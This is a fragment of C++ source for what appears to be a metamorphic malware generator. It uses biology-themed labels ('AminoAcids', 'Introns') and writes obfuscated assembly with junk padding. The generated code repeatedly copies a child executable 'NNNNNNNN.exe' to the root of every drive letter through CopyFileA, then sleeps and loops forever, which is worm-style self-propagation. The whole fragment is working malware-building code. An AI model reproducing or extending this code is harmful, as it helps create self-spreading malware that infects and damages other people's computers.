3064file << " _nopdD ; address to " << static_cast<char>(34) << "?:" << static_cast<char>(92) << "NNNNNNNN.exe" << static_cast<char>(34) << " to RegD" << endl; CreateAnIntron();
3065file << " " << endl; CreateAnIntron();
3066file << " _nopsB" << endl; CreateAnIntron();
3067file << " _save" << endl; CreateAnIntron();
3068file << " " << endl; CreateAnIntron();
3069zer0(1);
3070addnumber("0x0040");
3071subsaved(1);
3072file << " _JnzDown" << endl;
3073file << " _nopREAL" << endl;
3074file << " _push ; bFailIfExists=FALSE" << endl;
3075file << " _nopsD" << endl;
3076file << " _push ; lpNewFileName=" << static_cast<char>(34) << "?:" << static_cast<char>(92) << "NNNNNNNN.exe" << static_cast<char>(34) << "" << endl;
3077file << " " << endl; CreateAnIntron();
3078file << " " << endl; CreateAnIntron();
3079GetAddress("hCopyFileA");
3080file << " _getdata" << endl; CreateAnIntron();
3081file << " _nopdD" << endl; CreateAnIntron();
3082file << " " << endl; CreateAnIntron();
3083zer0(1);
3084addnumber("0x0040");
3085subsaved(1);
3086file << " _JnzDown" << endl;
3087file << " _nopsA" << endl;
3088file << " _push ; lpExistingFileName=" << static_cast<char>(34) << "NNNNNNNN.exe" << static_cast<char>(34) << "" << endl;
3089file << " _nopsD" << endl;
3090file << " _call ; stdcall dword[hCopyFileA]" << endl;
3091
3092file << " ; ##### End Copy child executable (or not)" << endl; CreateAnIntron();
3093file << " ; ############################################################################" << endl; CreateAnIntron();
3094
3095file << " _popall" << endl; CreateAnIntron();
3096file << " " << endl; CreateAnIntron();
3097GetAddress("Driveletter1");
3098file << " _saveWrtOff" << endl; CreateAnIntron();
3099file << " _getdata" << endl; CreateAnIntron();
3100addnumber("1");
3101file << " _writeByte" << endl; CreateAnIntron();
3102file << " " << endl; CreateAnIntron();
3103GetAddress("Driveletter2");
3104file << " _saveWrtOff" << endl; CreateAnIntron();
3105file << " _getdata" << endl; CreateAnIntron();
3106addnumber("1");
3107file << " _writeByte" << endl; CreateAnIntron();
3108file << " " << endl; CreateAnIntron();
3109file << " " << endl; CreateAnIntron();
3110file << " _nopsA" << endl; CreateAnIntron();
3111file << " _sub0001" << endl; CreateAnIntron();
3112file << " _nopdA" << endl; CreateAnIntron();
3113file << " " << endl; CreateAnIntron();
3114file << " _JnzUp" << endl; CreateAnIntron();
3115
3116file << " _popall" << endl; CreateAnIntron();
3117zer0(0);
3118addnumber("0x6666");
3119file << " _push" << endl; CreateAnIntron();
3120CallAPI("hSleep");
3121
3122
3123zer0(0);
3124addnumber("1");
3125file << " _JnzUp" << endl; CreateAnIntron();
3126
3127file << "" << endl;
3128file << "EndAminoAcids1:" << endl;
3129file << "" << endl;
3130file << "; ##################################################################" << endl;
3131file << "" << endl;
3132for (int i=0; i<500; i++) { CreateAnIntron(); }
3133file << "EndAmino:" << endl;
3134for (int i=0; i<500; i++) { CreateAnIntron(); }
3135file << ".end start";
3136
3137
3138 file.close();
3139 cout << "Created:" << endl;
3140 cout << "Translator Introns: " << cIntronN << endl;
3141 cout << "Codon Start/Stop Introns: " << IntronSTST << endl;
3142 cout << "Codon NOP Introns: " << IntronNOP << endl << endl;
3143 cout << "Finish :)" << endl;
3144 //cin.get();
3145 return(666);
3146}